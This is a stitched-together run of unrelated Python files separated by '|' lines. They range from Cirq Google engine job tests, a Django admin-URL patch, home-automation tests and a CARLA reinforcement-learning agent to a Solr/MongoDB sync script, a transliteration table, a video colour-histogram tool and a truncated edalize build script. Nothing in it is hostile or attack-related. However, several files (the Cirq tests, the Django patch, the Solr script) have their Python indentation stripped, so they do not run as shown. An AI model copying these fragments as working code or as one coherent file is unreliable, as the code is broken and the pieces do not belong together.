job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
results = [str(r) for r in job]
assert len(results) == 2
assert results[0] == 'q=0110'
assert results[1] == 'q=1010'
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_getitem(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert str(job[0]) == 'q=0110'
assert str(job[1]) == 'q=1010'
with pytest.raises(IndexError):
_ = job[2]
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_batched_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = BATCH_RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.results()
assert len(data) == 4
assert str(data[0]) == 'q=011'
assert str(data[1]) == 'q=111'
assert str(data[2]) == 'q=1101'
assert str(data[3]) == 'q=1001'
get_job_results.assert_called_once_with('a', 'b', 'steve')
data = job.batched_results()
assert len(data) == 2
assert len(data[0]) == 2
assert len(data[1]) == 2
assert str(data[0][0]) == 'q=011'
assert str(data[0][1]) == 'q=111'
assert str(data[1][0]) == 'q=1101'
assert str(data[1][1]) == 'q=1001'
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_batched_results_not_a_batch(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
with pytest.raises(ValueError, match='batched_results'):
job.batched_results()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = CALIBRATION_RESULT
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.calibration_results()
get_job_results.assert_called_once_with('a', 'b', 'steve')
assert len(data) == 1
assert data[0].code == v2.calibration_pb2.ERROR_CALIBRATION_FAILED
assert data[0].error_message == 'uh oh'
assert data[0].token == 'abc'
assert data[0].valid_until.timestamp() == 1234567891
assert len(data[0].metrics)
assert data[0].metrics['theta'] == {(cirq.GridQubit(0, 0), cirq.GridQubit(0, 1)): [0.9999]}
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_defaults(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
result = v2.calibration_pb2.FocusedCalibrationResult()
result.results.add()
get_job_results.return_value = quantum.QuantumResult(result=util.pack_any(result))
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.calibration_results()
get_job_results.assert_called_once_with('a', 'b', 'steve')
assert len(data) == 1
assert data[0].code == v2.calibration_pb2.CALIBRATION_RESULT_UNSPECIFIED
assert data[0].error_message is None
assert data[0].token is None
assert data[0].valid_until is None
assert len(data[0].metrics) == 0
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_results_not_a_calibration(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
with pytest.raises(ValueError, match='calibration results'):
job.calibration_results()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_len(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert len(job) == 2
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_timeout(get_job):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.RUNNING),
update_time=UPDATE_TIME,
)
get_job.return_value = qjob
job = cg.EngineJob('a', 'b', 'steve', EngineContext(timeout=0.1))
with pytest.raises(TimeoutError):
job.results()
def test_str():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert str(job) == 'EngineJob(project_id=\'a\', program_id=\'b\', job_id=\'steve\')'
|
from django.db import models
from django.core.urlresolvers import reverse
# Add admin Url to every content object
def get_admin_url(self):
return reverse('admin:%s_%s_change' % (self._meta.app_label, self._meta.module_name), args=[self.pk])
@classmethod
def get_class_admin_url(cls):
return reverse('admin:%s_%s_add' % (cls._meta.app_label, cls._meta.module_name))
models.Model.get_admin_url = get_admin_url
models.Model.get_class_admin_url = get_class_admin_url
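# Illustrative sketch only: with the patch above applied, any model instance
# exposes admin links. The `article` argument stands in for a hypothetical
# model instance (e.g. of a news.Article model).
def admin_links_example(article):
    # e.g. '/admin/news/article/42/' and '/admin/news/article/add/'
    return article.get_admin_url(), article.__class__.get_class_admin_url()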
|
import time
from zone_api import platform_encapsulator as pe
from zone_api.core.actions.play_music_at_dinner_time import PlayMusicAtDinnerTime
from zone_api.core.devices.activity_times import ActivityTimes, ActivityType
from zone_api.core.devices.motion_sensor import MotionSensor
from zone_api_test.core.device_test import DeviceTest, create_zone_manager
from zone_api.core.event_info import EventInfo
from zone_api.core.neighbor import Neighbor, NeighborType
from zone_api.core.zone import Zone
from zone_api.core.zone_event import ZoneEvent
class PlayMusicAtDinnerTimeTest(DeviceTest):
""" Unit tests for play_music_at_dinner_time.py. """
def setUp(self):
self.sink, items = self.create_audio_sink()
items.append(pe.create_switch_item('MotionSensor'))
self.motion_item = items[-1]
self.set_items(items)
super(PlayMusicAtDinnerTimeTest, self).setUp()
self.motion = MotionSensor(self.motion_item)
time_map = {
ActivityType.DINNER: '0:00 - 23:59',
}
self.activity_times = ActivityTimes(time_map)
self.action = PlayMusicAtDinnerTime()
def tearDown(self):
if self.action._timer is not None:
self.action._timer.cancel()
super(PlayMusicAtDinnerTimeTest, self).tearDown()
def testOnAction_noAudioSink_returnsFalse(self):
zone1 = Zone('Kitchen').add_device(self.motion).add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertFalse(value)
def testOnAction_audioSinkInZoneButNoActivityTimes_returnsFalse(self):
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion).add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertFalse(value)
def testOnAction_audioSinkInZone_playsStreamAndReturnsTrue(self):
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion) \
.add_device(self.activity_times) \
.add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
def testOnAction_audioSinkInNeighborZone_playsStreamAndReturnsTrue(self):
zone1 = Zone('Kitchen').add_device(self.motion).add_device(self.activity_times) \
.add_action(self.action)
zone2 = Zone('great-room').add_device(self.sink)
zone1 = zone1.add_neighbor(Neighbor(zone2.get_id(), NeighborType.OPEN_SPACE_MASTER))
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1, zone2]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
def testOnAction_audioSinkInZone_automaticallyPauseAtDesignatedPeriod(self):
self.action = PlayMusicAtDinnerTime(duration_in_minutes=0.00025)
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion) \
.add_device(self.activity_times) \
.add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
time.sleep(0.02)
self.assertEqual('pause', self.sink._get_last_test_command())
|
import glob
import os
import sys
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
try:
sys.path.append(glob.glob("/home/icv/.local/lib/python3.6/site-packages/")[0])
except IndexError:
pass
import carla
import time
import numpy as np
import math
import random
from collections import deque
import cv2
from tqdm import tqdm
# For rl
import gym
from gym import core, error, spaces, utils
from gym.utils import seeding
from stable_baselines import SAC
from TestScenario import CarEnv
from TestRule import IDM
EPISODES=100
class TiRLAgent(object):
def __init__(self, env):
self.env = env
load_path_rl="/home/icv/Trustworth/TiRL/models/sac-5"
log_path_rl="/home/icv/Trustworth/TiRL/data/sac-5"
self.model_rl = SAC.load(load_path_rl, env=env, tensorboard_log=log_path_rl)
load_path_rule="/home/icv/Trustworth/TiRL/models/sac_rule3"
log_path_rule="/home/icv/Trustworth/TiRL/data/sac_rule3"
self.model_rule = SAC.load(load_path_rule, env=env, tensorboard_log=log_path_rule)
self.agent_rule = IDM(env)
print("load model successfully")
self.reset()
def reset(self):
self.rule_step = 0
self.rl_step = 0
def act(self, state):
action_rl, _states = self.model_rl.predict(state,deterministic=True)
action_rule = self.agent_rule.act(state)
q_rl = self.model_rl.get_q_value([state],np.array([action_rl]))
q_rule = self.model_rule.get_q_value([state],np.array([action_rule])[None])
# print("----",float(q_rule),float(q_rl))
# action = (action_rl, action_rule)[float(q_rule)>float(q_rl)]
if q_rule > q_rl:
action = action_rule
self.rule_step = self.rule_step+1
else:
action = action_rl
self.rl_step = self.rl_step+1
return action
if __name__ == '__main__':
# Load the model
# model = load_model(MODEL_PATH)
# Create environment
env = CarEnv(random_env=False)
# Create Agent
agent = TiRLAgent(env)
# For agent speed measurements - keeps last 60 frametimes
fps_counter = deque(maxlen=60)
# Loop over episodes
for episode in tqdm(range(1, EPISODES + 1), unit='episodes'):
print('Restarting episode')
# Reset environment and get initial state
current_state = env.reset()
env.collision_hist = []
episode_reward = 0
step = 1
done = False
# Loop over steps
while True:
# For FPS counter
step_start = time.time()
action = agent.act(current_state)
new_state, reward, done, _ = env.step(action)
episode_reward += reward
# Set current step for next loop iteration
current_state = new_state
step += 1
# If done - agent crashed, break an episode
if done:
break
# Measure step time, append to a deque, then print mean FPS for last 60 frames, q values and taken action
frame_time = time.time() - step_start
fps_counter.append(frame_time)
print("Episode Reward:",episode_reward," RL Step: ",agent.rl_step," Rule Step: ",agent.rule_step)
with open("data/TiRL/RL_results.txt", "a") as result_recorder:
            result_recorder.write(str(episode_reward) + ' ' + str(agent.rl_step) + ' ' + str(agent.rule_step) + '\n')
agent.reset()
|
#!/usr/bin/env python3
import os, sys
import traceback
from pymongo import MongoClient
import random
from bson.objectid import ObjectId
from solr import SOLR
from solr import SOLR_CORE_NAME
class SearchSolr():
def __init__(self, ip='127.0.0.1', solr_core=SOLR_CORE_NAME):
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = solr_core
self.solr = SOLR(self.solr_url)
def load_data(self, select='*:*', fields=[], max_num=10, flag=False):
try:
def pro_x(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['instruction'] = x['instruction'][0]
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ['']
y['answers'] = x['answer']
y['emotion_name'] = 'null'
y['emotion_url'] = 'null'
if 'media' in x:
y['media'] = x['media'][0]
y['timeout'] = '15'
else:
y['media'] = 'null'
y['timeout'] = '0'
return y
Data = {}
def pro_y(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['intent'] = x['intent']
y['questions'] = x['question']
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ''
if y['intent']+'|'+y['entities'] in Data:
Data[y['intent']+'|'+y['entities']]['questions'].append(x['question'][0])
else:
Data[y['intent']+'|'+y['entities']] = y
return y
if flag == True:
data = [pro_x(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
else:
data = [pro_y(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
data = []
for key in Data.keys():
data.append(Data[key])
return data
except:
traceback.print_exc()
return None
class Mongodb():
def __init__(self, db_name, ip='127.0.0.1', port=27017):
self.db_name = db_name
self.db = MongoClient(ip, port)[db_name]
self.db_test = MongoClient(ip, port)[db_name+'_test']
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = SOLR_CORE_NAME
self.solr = SOLR(self.solr_url)
def write(self, collection, data):
try:
self.db[collection].drop()
            self.db[collection].insert_many(data)
            self.db_test[collection].drop()
            self.db_test[collection].insert_many(data)
return 1
except:
traceback.print_exc()
return 0
def write_data2solr(self, collection):
query = 'scene_str:'+self.db_name+' AND topic_str:' +\
collection
self.solr.delete_solr_by_query(self.solr_core, query)
for x in self.db[collection].find():
data_one = x.copy()
data_one['scene'] = self.db_name
data_one['topic'] = collection
data_one['_id'] = str(data_one['_id'])
if collection in ['instruction']:
self.solr.update_solr(data_one, self.solr_core)
continue
if 'super_intention' in data_one:
if data_one['super_intention'] == '':
data_one['super_intention'] = 'null'
data_one.pop('questions')
for q in x['questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.solr_core)
if __name__ == '__main__':
mongo = Mongodb(db_name='bookstore')
s = SearchSolr(solr_core='instruction')
data = s.load_data(max_num=100, flag=True)
mongo.write(collection='instruction', data=data)
mongo.write_data2solr(collection='instruction')
s = SearchSolr(solr_core='automata')
data = s.load_data(max_num=100000)
mongo.write(collection='automata', data=data)
mongo.write_data2solr(collection='automata')
|
from .rates import RateManager
from .vrws import Rate, Rates, VRWSException, VRWSSOAPException,\
VRWSHTTPException, VRWSErrorException
from .tic import TICException, TICHTTPException
__all__ = ['RateManager', 'Rates', 'Rate',
'VRWSException', 'VRWSSOAPException', 'VRWSHTTPException',
'VRWSErrorException',
'TICException', 'TICHTTPException']
|
my_string = "abcba"
if my_string == my_string[::-1]:
print("palindrome")
else:
print("not palindrome")
# Output
# palindrome
|
data = (
'Ze ', # 0x00
'Xi ', # 0x01
'Guo ', # 0x02
'Yi ', # 0x03
'Hu ', # 0x04
'Chan ', # 0x05
'Kou ', # 0x06
'Cu ', # 0x07
'Ping ', # 0x08
'Chou ', # 0x09
'Ji ', # 0x0a
'Gui ', # 0x0b
'Su ', # 0x0c
'Lou ', # 0x0d
'Zha ', # 0x0e
'Lu ', # 0x0f
'Nian ', # 0x10
'Suo ', # 0x11
'Cuan ', # 0x12
'Sasara ', # 0x13
'Suo ', # 0x14
'Le ', # 0x15
'Duan ', # 0x16
'Yana ', # 0x17
'Xiao ', # 0x18
'Bo ', # 0x19
'Mi ', # 0x1a
'Si ', # 0x1b
'Dang ', # 0x1c
'Liao ', # 0x1d
'Dan ', # 0x1e
'Dian ', # 0x1f
'Fu ', # 0x20
'Jian ', # 0x21
'Min ', # 0x22
'Kui ', # 0x23
'Dai ', # 0x24
'Qiao ', # 0x25
'Deng ', # 0x26
'Huang ', # 0x27
'Sun ', # 0x28
'Lao ', # 0x29
'Zan ', # 0x2a
'Xiao ', # 0x2b
'Du ', # 0x2c
'Shi ', # 0x2d
'Zan ', # 0x2e
'[?] ', # 0x2f
'Pai ', # 0x30
'Hata ', # 0x31
'Pai ', # 0x32
'Gan ', # 0x33
'Ju ', # 0x34
'Du ', # 0x35
'Lu ', # 0x36
'Yan ', # 0x37
'Bo ', # 0x38
'Dang ', # 0x39
'Sai ', # 0x3a
'Ke ', # 0x3b
'Long ', # 0x3c
'Qian ', # 0x3d
'Lian ', # 0x3e
'Bo ', # 0x3f
'Zhou ', # 0x40
'Lai ', # 0x41
'[?] ', # 0x42
'Lan ', # 0x43
'Kui ', # 0x44
'Yu ', # 0x45
'Yue ', # 0x46
'Hao ', # 0x47
'Zhen ', # 0x48
'Tai ', # 0x49
'Ti ', # 0x4a
'Mi ', # 0x4b
'Chou ', # 0x4c
'Ji ', # 0x4d
'[?] ', # 0x4e
'Hata ', # 0x4f
'Teng ', # 0x50
'Zhuan ', # 0x51
'Zhou ', # 0x52
'Fan ', # 0x53
'Sou ', # 0x54
'Zhou ', # 0x55
'Kuji ', # 0x56
'Zhuo ', # 0x57
'Teng ', # 0x58
'Lu ', # 0x59
'Lu ', # 0x5a
'Jian ', # 0x5b
'Tuo ', # 0x5c
'Ying ', # 0x5d
'Yu ', # 0x5e
'Lai ', # 0x5f
'Long ', # 0x60
'Shinshi ', # 0x61
'Lian ', # 0x62
'Lan ', # 0x63
'Qian ', # 0x64
'Yue ', # 0x65
'Zhong ', # 0x66
'Qu ', # 0x67
'Lian ', # 0x68
'Bian ', # 0x69
'Duan ', # 0x6a
'Zuan ', # 0x6b
'Li ', # 0x6c
'Si ', # 0x6d
'Luo ', # 0x6e
'Ying ', # 0x6f
'Yue ', # 0x70
'Zhuo ', # 0x71
'Xu ', # 0x72
'Mi ', # 0x73
'Di ', # 0x74
'Fan ', # 0x75
'Shen ', # 0x76
'Zhe ', # 0x77
'Shen ', # 0x78
'Nu ', # 0x79
'Xie ', # 0x7a
'Lei ', # 0x7b
'Xian ', # 0x7c
'Zi ', # 0x7d
'Ni ', # 0x7e
'Cun ', # 0x7f
'[?] ', # 0x80
'Qian ', # 0x81
'Kume ', # 0x82
'Bi ', # 0x83
'Ban ', # 0x84
'Wu ', # 0x85
'Sha ', # 0x86
'Kang ', # 0x87
'Rou ', # 0x88
'Fen ', # 0x89
'Bi ', # 0x8a
'Cui ', # 0x8b
'[?] ', # 0x8c
'Li ', # 0x8d
'Chi ', # 0x8e
'Nukamiso ', # 0x8f
'Ro ', # 0x90
'Ba ', # 0x91
'Li ', # 0x92
'Gan ', # 0x93
'Ju ', # 0x94
'Po ', # 0x95
'Mo ', # 0x96
'Cu ', # 0x97
'Nian ', # 0x98
'Zhou ', # 0x99
'Li ', # 0x9a
'Su ', # 0x9b
'Tiao ', # 0x9c
'Li ', # 0x9d
'Qi ', # 0x9e
'Su ', # 0x9f
'Hong ', # 0xa0
'Tong ', # 0xa1
'Zi ', # 0xa2
'Ce ', # 0xa3
'Yue ', # 0xa4
'Zhou ', # 0xa5
'Lin ', # 0xa6
'Zhuang ', # 0xa7
'Bai ', # 0xa8
'[?] ', # 0xa9
'Fen ', # 0xaa
'Ji ', # 0xab
'[?] ', # 0xac
'Sukumo ', # 0xad
'Liang ', # 0xae
'Xian ', # 0xaf
'Fu ', # 0xb0
'Liang ', # 0xb1
'Can ', # 0xb2
'Geng ', # 0xb3
'Li ', # 0xb4
'Yue ', # 0xb5
'Lu ', # 0xb6
'Ju ', # 0xb7
'Qi ', # 0xb8
'Cui ', # 0xb9
'Bai ', # 0xba
'Zhang ', # 0xbb
'Lin ', # 0xbc
'Zong ', # 0xbd
'Jing ', # 0xbe
'Guo ', # 0xbf
'Kouji ', # 0xc0
'San ', # 0xc1
'San ', # 0xc2
'Tang ', # 0xc3
'Bian ', # 0xc4
'Rou ', # 0xc5
'Mian ', # 0xc6
'Hou ', # 0xc7
'Xu ', # 0xc8
'Zong ', # 0xc9
'Hu ', # 0xca
'Jian ', # 0xcb
'Zan ', # 0xcc
'Ci ', # 0xcd
'Li ', # 0xce
'Xie ', # 0xcf
'Fu ', # 0xd0
'Ni ', # 0xd1
'Bei ', # 0xd2
'Gu ', # 0xd3
'Xiu ', # 0xd4
'Gao ', # 0xd5
'Tang ', # 0xd6
'Qiu ', # 0xd7
'Sukumo ', # 0xd8
'Cao ', # 0xd9
'Zhuang ', # 0xda
'Tang ', # 0xdb
'Mi ', # 0xdc
'San ', # 0xdd
'Fen ', # 0xde
'Zao ', # 0xdf
'Kang ', # 0xe0
'Jiang ', # 0xe1
'Mo ', # 0xe2
'San ', # 0xe3
'San ', # 0xe4
'Nuo ', # 0xe5
'Xi ', # 0xe6
'Liang ', # 0xe7
'Jiang ', # 0xe8
'Kuai ', # 0xe9
'Bo ', # 0xea
'Huan ', # 0xeb
'[?] ', # 0xec
'Zong ', # 0xed
'Xian ', # 0xee
'Nuo ', # 0xef
'Tuan ', # 0xf0
'Nie ', # 0xf1
'Li ', # 0xf2
'Zuo ', # 0xf3
'Di ', # 0xf4
'Nie ', # 0xf5
'Tiao ', # 0xf6
'Lan ', # 0xf7
'Mi ', # 0xf8
'Jiao ', # 0xf9
'Jiu ', # 0xfa
'Xi ', # 0xfb
'Gong ', # 0xfc
'Zheng ', # 0xfd
'Jiu ', # 0xfe
'You ', # 0xff
)
|
from .column_append import column_append
|
#!/usr/bin/env python
import cv2
import sys
import numpy as np
import logging
from pathlib import Path
import matplotlib.pyplot as plt
import squarify
import subprocess
import argparse
from sklearn.cluster import KMeans, MiniBatchKMeans
import av
# Pixel ordering for different backends
colorformats = {
'pyav': [0,1,2], # RGB
'opencv': [2,1,0], # BGR
}
def hexcolor(rgb):
return f"#{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}"
def get_frame_types(video_fn):
command = 'ffprobe -v error -show_entries frame=pict_type -of default=noprint_wrappers=1'.split()
out = subprocess.check_output(command + [video_fn]).decode()
frame_types = out.replace('pict_type=','').split()
return zip(range(len(frame_types)), frame_types)
parser = argparse.ArgumentParser(description='Video Histogram')
parser.add_argument('vid_filename', help='Video file to process')
# Where to save output files
parser.add_argument('-d', '--output_dir', default=None, help='Output directory')
# Number of palette colors to use
parser.add_argument('-c', '--colors', type=int, default=256, help='Number of colors to use')
# Option to force regeneration of histogram
parser.add_argument('-f', '--force', action='store_true', help='Force recomputation of the histogram')
# Which backend to use (opencv or pyav)
parser.add_argument('-b', '--backend', choices=['opencv', 'pyav'], default='opencv',
help='Which backend to use (PyAV or OpenCV)')
# Only look at I-frames
parser.add_argument('-i', '--iframes', action='store_true', help='Only look at I-frames')
# Which clustering algorithm to use
parser.add_argument('-m', '--method', choices=['kmeans', 'mbkmeans'], default='mbkmeans',
help='Which clustering algorithm to use (K-Means or MiniBatchKMeans)')
# Random seed for K-Means
parser.add_argument('-s', '--seed', type=int, default=0, help='Random seed for K-Means')
# Ignore colors that are too close to black or white
parser.add_argument('-t', '--threshold', type=int, default=0, help='Ignore colors that are within this distance of black/white (Euclidean)')
# Ignore colors that are more than a particular percentage of the total
parser.add_argument('-p', '--percent', type=float, default=100.0, help='Ignore colors that are more than this percent of the video')
# Verbose flag
parser.add_argument('-V', '--verbose', action="store_const", dest="loglevel", const=logging.INFO, help='Enable info messages')
# Debug flag
parser.add_argument('-D', '--debug', action="store_const", dest="loglevel", const=logging.DEBUG, help='Enable debug messages')
args = parser.parse_args()
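# Example invocation combining the flags above (script name, file paths and
# values are hypothetical):
#   python vidhist.py movie.mp4 -c 64 -b pyav -i -t 32 -p 5.0 -d out/ -V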
ClusterAlg = {
'kmeans': KMeans,
'mbkmeans': MiniBatchKMeans
}[args.method]
log_fmt = '[{levelname:<5s}] {message}'
logging.basicConfig(level=args.loglevel, format=log_fmt, style='{')
if args.percent > 100.0 or args.percent < 0.0:
parser.error('Percentage must be between 0 and 100')
vid_filename = Path(args.vid_filename)
if not vid_filename.is_file():
print("Error: File not found:", vid_filename, file=sys.stderr)
sys.exit(1)
def iter_frames(cap):
while True:
ret, frame = cap.read()
if not ret:
break
yield frame
def iter_iframes(cap):
frame_types = get_frame_types(str(vid_filename))
i_frames = [i for i, t in frame_types if t == 'I']
for i in i_frames:
cap.set(cv2.CAP_PROP_POS_FRAMES, i)
ret, frame = cap.read()
if not ret: continue
yield frame
BATCH_SIZE = 1000
def get_hist_opencv(filename, iframes=False):
def val2chars(i):
return bytes.fromhex(f"{int(i):08x}")[::-1].decode()
cap = cv2.VideoCapture(filename)
pix_fmt = val2chars(cap.get(cv2.CAP_PROP_CODEC_PIXEL_FORMAT))
fourcc = val2chars(cap.get(cv2.CAP_PROP_FOURCC))
logging.debug(
f'Opened {filename} {int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))}x{int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))} '
f'{pix_fmt} {int(cap.get(cv2.CAP_PROP_FRAME_COUNT))} '
f'{cap.get(cv2.CAP_PROP_FPS)} fps {fourcc}')
hist = np.zeros((256,256,256))
framefn = iter_iframes if args.iframes else iter_frames
i = 0
total_frames = 0
batch = []
for frame in framefn(cap):
batch.append(frame)
i += 1
if i == BATCH_SIZE:
hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
batch = []
total_frames += i
i = 0
if batch: hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
total_frames += i
logging.debug(f'Processed {total_frames} frames')
cap.release()
return hist
def get_hist_pyav(filename, iframes=False):
hist = np.zeros((256,256,256))
with av.open(filename) as container:
stream = container.streams.video[0]
logging.debug(
f'Opened {filename} {stream.codec_context.width}x{stream.codec_context.height} '
f'{stream.codec_context.pix_fmt} {stream.codec_context.encoded_frame_count} '
f'{float(stream.codec_context.framerate)} fps {stream.codec_context.codec.name}')
if iframes: stream.codec_context.skip_frame = 'NONREF'
stream.thread_type = 'AUTO'
i = 0
total_frames = 0
batch = []
for frame in container.decode(stream):
batch.append(frame.to_ndarray(format='rgb24'))
i += 1
if i == BATCH_SIZE:
hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
batch = []
total_frames += i
i = 0
if batch: hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
total_frames += i
logging.debug(f'Processed {total_frames} frames')
return hist
if args.output_dir:
hist_filename = (Path(args.output_dir) / vid_filename.name).with_suffix('.hist.npz')
else:
hist_filename = vid_filename.with_suffix('.hist.npz')
if args.force or not hist_filename.exists():
logging.info("Calculating video histogram...")
if args.backend == 'opencv':
hist = get_hist_opencv(str(vid_filename),iframes=args.iframes)
elif args.backend == 'pyav':
hist = get_hist_pyav(str(vid_filename),iframes=args.iframes)
else:
print("Error: Invalid backend:", args.backend, file=sys.stderr)
sys.exit(1)
np.savez_compressed(str(hist_filename), hist=hist)
else:
hist = np.load(str(hist_filename))['hist']
# Initial list of colors in the video
all_colors = np.argwhere(hist).astype(np.uint8)
logging.info(f"Total colors: {len(all_colors)}")
# Filter out colors that are too close to black or white
if args.threshold:
logging.info("Filtering out colors that are too close to black...")
all_colors = all_colors[np.sqrt(np.sum(np.square(np.abs(all_colors - [0,0,0])), axis=1)) > args.threshold]
logging.info(f"{len(all_colors)} colors remain")
logging.info("Filtering out colors that are too close to white...")
all_colors = all_colors[np.sqrt(np.sum(np.square(np.abs(all_colors - [255,255,255])), axis=1)) > args.threshold]
logging.info(f"{len(all_colors)} colors remain")
if len(all_colors) < args.colors:
logging.warning(f"{len(all_colors)} colors found, but {args.colors} requested. Using {len(all_colors)} instead.")
args.colors = len(all_colors)
# Use K-Means to cluster the colors
logging.info(f"Clustering to select {args.colors} dominant colors...")
kmeans = ClusterAlg(n_clusters=args.colors, random_state=args.seed,
verbose=1 if args.loglevel == logging.DEBUG else 0)
kmeans.fit(all_colors, sample_weight=hist[all_colors[:,0],all_colors[:,1],all_colors[:,2]])
palette = np.rint(kmeans.cluster_centers_).astype(np.uint8)
# Convert backend's color format to RGB
palette = palette[:,colorformats[args.backend]]
palhist = np.zeros(args.colors)
palidx = kmeans.predict(all_colors)
for color, idx in zip(all_colors, palidx):
palhist[idx] += hist[color[0], color[1], color[2]]
palhist /= palhist.sum()
# Filter out colors that are too dominant (more than a certain percentage of the video after clustering)
if args.percent < 100.0:
logging.info("Filtering out colors that are too dominant...")
before = len(palhist[palhist > 0.0])
palhist[palhist*100.0 > args.percent] = 0.0
after = len(palhist[palhist > 0.0])
logging.info(f"Palette reduced from {before} to {after} colors")
palette = palette.astype(np.float32) / 255
# Use squarify to plot the histogram using the palette colors.
# Skip any colors with zero frequency.
squarify.plot(sizes=palhist[palhist > 0], color=palette[palhist > 0])
plt.axis('off')
if args.output_dir:
vidhist_filename = (Path(args.output_dir) / vid_filename.name).with_suffix('.hist.png')
else:
vidhist_filename = vid_filename.with_suffix('.hist.png')
plt.savefig(str(vidhist_filename), bbox_inches='tight', pad_inches=0)
print(f"Saved video colors to {vidhist_filename}")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import edalize
import os
work_root = 'build'
post_imp_file = os.path.realpath(os.path.join(work_root, 'post.tcl'))
os.makedirs(work_root, exist_ok=True)
synth_tool = 'vivado'
srcs = [
'lowrisc_constants_top_pkg_0/rtl/top_pkg.sv',
